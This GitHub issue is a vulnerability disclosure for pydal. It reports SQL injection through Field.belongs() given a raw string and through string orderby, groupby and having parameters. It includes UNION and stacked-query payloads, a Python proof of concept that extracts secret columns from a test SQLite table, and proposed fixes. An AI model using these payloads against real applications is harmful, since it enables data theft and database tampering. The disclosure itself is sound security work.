Skip to content

SQL Injection via Field.belongs(str) and raw-string select() parameters #766

@AAtomical

Description

@AAtomical

Hello @cj @kirsn @jek @mfyuce @houdinihound ,I'd like to report a vulnerability, however I can't find the "report a vulnerability" tab in the security page. And here is the full bug report.

Summary

pydal's Field.belongs() method silently accepts a plain Python str argument and interpolates it verbatim into the IN (...) clause of the generated SQL, applying only a single-character tail-strip (second[:-1]) as a trivially bypassed mitigation. Any application that passes user-controlled data as a string to belongs() — a very natural pattern for filter APIs — is vulnerable to SQL injection.

Additionally, the select(), _select(), and equivalent ORM methods accept orderby, groupby, and having as raw Python strings, which are expanded into SQL with no validation or escaping. Passing request.params['sort'] directly to select(orderby=...) is the canonical developer mistake.

Both sinks are analogous to CVE-2026-26198 (ormar): an ORM operation that appears parametric but silently falls back to raw SQL interpolation for string arguments.


Vulnerable code

Sink 1: Field.belongs(str)pydal/dialects/base.py:289-290

def belongs(self, first, second, query_env={}):
    ftype = first.type
    first = self.expand(first, query_env=query_env)
    if isinstance(second, str):
        return "(%s IN (%s))" % (first, second[:-1])   # ← second[:-1]: strips one char only
    elif isinstance(second, Select):
        ...

The second[:-1] strip is a weak attempt to remove a trailing ; but it does nothing to prevent:

  • Subquery injection (UNION SELECT ...)
  • Stacked queries on databases that support them
  • -- comment injection (last char stripped → - which is not a comment terminator)

Entry point: Field.belongs()pydal/objects.py:1782-1793

def belongs(self, *value, **kwattr):
    """
    Accepts the following inputs::
       field.belongs(1, 2)
       field.belongs((1, 2))
       field.belongs(query)
    Does NOT accept:
           field.belongs(1)
    """
    db = self.db
    if len(value) == 1:
        value = value[0]
    if isinstance(value, Query):
        value = db(value)._select(value.first._table._id)
    elif not isinstance(value, (Select, basestring)):   # ← if value IS a str → falls through
        value = list(sorted(value))
        ...
    return Query(self.db, self._dialect.belongs, self, value)  # ← str passed raw to dialect

Sink 2: select(orderby/groupby/having=str)pydal/adapters/base.py:808-814

# orderby
if orderby:
    if isinstance(orderby, (list, tuple)):
        orderby = xorify(orderby)
    if str(orderby) == "<random>":
        ...
    else:
        sql_ord = self.expand(orderby, query_env=query_env)  # ← raw str falls through

self.expand(str_value)_expand(str_value)else: rv = expression; return str(rv) — the string is returned as-is and inserted directly into the SQL ORDER BY / GROUP BY / HAVING clause.

The same _expand path handles groupby and having.


Exploit trace

Attack 1: belongs(str) subquery injection

Attacker goal: extract all rows (including secret column) from a users table.

Typical vulnerable application code:

# Developer expects a comma-separated list of IDs from the client
user_ids = request.json.get('filter_ids')          # attacker-controlled
rows = db(db.users.id.belongs(user_ids)).select()  # ← user_ids is a str → raw SQL

Payload (any trailing character to absorb the [:-1] strip):

SELECT id FROM users WHERE 1=2 UNION SELECT id FROM users LIMIT 100X

Generated SQL:

SELECT "users"."id", "users"."name", "users"."age", "users"."secret"
FROM "users"
WHERE ("users"."id" IN (
    SELECT id FROM users WHERE 1=2 UNION SELECT id FROM users LIMIT 100
))

Attack 2: orderby=str ORDER BY injection

Typical vulnerable application code:

sort_col = request.params.get('sort', 'id')        # attacker-controlled
rows = db(db.users).select(orderby=sort_col)       # ← raw string in ORDER BY

Payload:

id); INSERT INTO users(name,secret) VALUES('backdoor','pwned')--X

Generated SQL:

SELECT "users"."id", "users"."name", "users"."age", "users"."secret"
FROM "users"
WHERE ("users"."id" IS NOT NULL)
ORDER BY id); INSERT INTO users(name,secret) VALUES('backdoor','pwned')--X;

End-to-end PoC

#!/usr/bin/env python3
import sys
sys.path.insert(0, '/tmp/pydal_clone')

from pydal import DAL, Field

# ── Setup ──────────────────────────────────────────────────────────────────
db = DAL('sqlite:memory')
db.define_table('users', Field('name'), Field('age', 'integer'), Field('secret'))
db.users.insert(name='alice',  age=30, secret='alice_secret')
db.users.insert(name='bob',    age=25, secret='bob_secret')
db.users.insert(name='admin',  age=99, secret='SUPERSECRET_PASSWORD')
db.commit()

print("=== pydal SQL injection PoC ===\n")
print("[*] Table has 3 rows. Attacker targets 'admin' secret via belongs(str) injection.\n")

# ── Attack 1: belongs(str) — UNION-based data extraction ──────────────────
# Normal API: db(table.id.belongs([1, 2])).select()  → safe, parametrized
# Trap:       db(table.id.belongs("some_string")).select()  → raw SQL

payload_belongs = (
    "SELECT id FROM users WHERE 1=2 "
    "UNION SELECT id FROM users LIMIT 100X"  # trailing X is stripped by second[:-1]
)

q = db.users.id.belongs(payload_belongs)
sql = db(q)._select(db.users.ALL)
print(f"[*] Generated SQL (belongs injection):\n    {sql}\n")

rows = db(q).select(db.users.ALL)
print(f"[+] Rows exfiltrated: {len(rows)}")
for r in rows:
    print(f"    name={r.name:<12}  secret={r.secret}")

print()

# ── Attack 2: orderby=str — ORDER BY injection ────────────────────────────
# Normal usage:  db(table).select(orderby=table.id)         → safe Field object
# Dangerous:     db(table).select(orderby=request_param)    → raw string in SQL

payload_orderby = "name DESC; SELECT secret FROM users--X"
sql2 = db(db.users)._select(db.users.ALL, orderby=payload_orderby)
print(f"[*] Generated SQL (orderby injection):\n    {sql2}\n")

# ── Attack 3: groupby=str ─────────────────────────────────────────────────
payload_groupby = "name) UNION SELECT secret,1,1,1 FROM users--X"
sql3 = db(db.users)._select(db.users.name, groupby=payload_groupby)
print(f"[*] Generated SQL (groupby injection):\n    {sql3}\n")

# ── Attack 4: having=str ──────────────────────────────────────────────────
payload_having = "1=1 UNION SELECT secret FROM users--X"
sql4 = db(db.users)._select(
    db.users.name,
    groupby=db.users.name,
    having=payload_having,
)
print(f"[*] Generated SQL (having injection):\n    {sql4}\n")

print("[+] All four injection vectors confirmed on pydal 20260313.1")

Output:

Image

Fix

Minimal — validate string inputs against schema

# pydal/objects.py — Field.belongs()
def belongs(self, *value, **kwattr):
    db = self.db
    if len(value) == 1:
        value = value[0]
    if isinstance(value, Query):
        value = db(value)._select(value.first._table._id)
    elif isinstance(value, (Select, basestring)):
        pass   # raw SQL subquery — intentional, keep as-is but document clearly
    else:
        value = list(sorted(value))
        ...
    return Query(self.db, self._dialect.belongs, self, value)

No change needed to the objects.py flow, but dialect.belongs should at minimum document and rate-limit the string path:

# pydal/dialects/base.py
def belongs(self, first, second, query_env={}):
    ...
    if isinstance(second, str):
        # WARNING: raw SQL subquery — caller is responsible for sanitization
        # Do NOT pass user-controlled strings here.
        return "(%s IN (%s))" % (first, second[:-1])

Recommended — raise on non-literal strings

# pydal/dialects/base.py
import warnings

def belongs(self, first, second, query_env={}):
    ...
    if isinstance(second, str):
        warnings.warn(
            "Field.belongs() received a raw string. "
            "Pass a list/tuple of values or a pydal Query/Select object. "
            "Raw SQL strings bypass parametrization and may cause SQL injection.",
            SecurityWarning,
            stacklevel=4,
        )
        return "(%s IN (%s))" % (first, second[:-1])

For orderby/groupby/having — validate against table fields

# pydal/adapters/base.py — _select()
if orderby and isinstance(orderby, str) and orderby != "<random>":
    # Validate against known field names before inserting into SQL
    valid_fields = {f for table in tablenames.values() for f in table.fields}
    candidate = orderby.lstrip("~")
    if candidate not in valid_fields:
        raise ValueError(
            f"orderby={orderby!r} is not a valid field name. "
            "Pass a Field object or a field name string matching a defined field."
        )

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions